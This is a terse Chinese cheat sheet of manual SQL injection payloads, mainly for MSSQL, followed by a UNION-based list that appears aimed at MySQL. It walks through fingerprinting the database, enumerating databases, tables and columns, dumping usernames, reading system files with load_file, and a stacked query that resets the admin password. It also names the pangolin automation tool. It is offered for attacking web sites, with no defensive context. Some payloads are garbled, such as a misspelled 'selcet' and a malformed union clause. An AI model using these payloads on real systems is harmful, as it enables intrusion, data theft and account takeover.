Mssql手工注入技巧:
查用户
and user>0
一,判断数据库类型:
and (select count(*)from)>0
二,判断注入点:
and 1=1 正确
and 1=2 错误
三,判断版本号:
and @@version>0
四,判断当前数据库的用户:
and name() >0
五,判断当前连接数据库:
and db_name() >0
六,判断其他数据库:orac无法跨库查询
and (select name from master.dbo.sysdatabases where dbid=6)>0
1-5是系统数据库。
七,判断表名:
and (select top 1 name from sysobjects where xtype='u' and status >0)>0
八,判断其他表:
and (select top 1 name from sysobjects where xtype='u' and status >0 and name not in ('t_jiaozhu'))>0
九,判断列:
1.第一列:admin and (selcet top 1 col_name(object_id ('admin'),1)from sysobjects)>0
十,判断值:
and (select username from admin)>1
十一:更改admin密码:用英文
;update db.dbo.admin set password='abcd' where username='admin';–
–的意思是停止执行。
十二:自动化工具pangolin下载:
Mssql手工注入技巧:
1.判断注入点:’
2.判断注入点:and 1=1 and 1=2
3.判断版本号: union select version()
4.判断库名 :union select database()
5.判断连接用户: union select user()
6.判断连接用户:union 1 from dv_admin
7.爆数据:union select username from dv_admin
8.读取系统文件:union select load_file(c:\boot.ini)
load_file.读取系统文件 \需要转16进制
9.字段联合查询:union select null,null,null,null,null,user,null from user_tables
必背符号转义:
’ = %27
% = %25
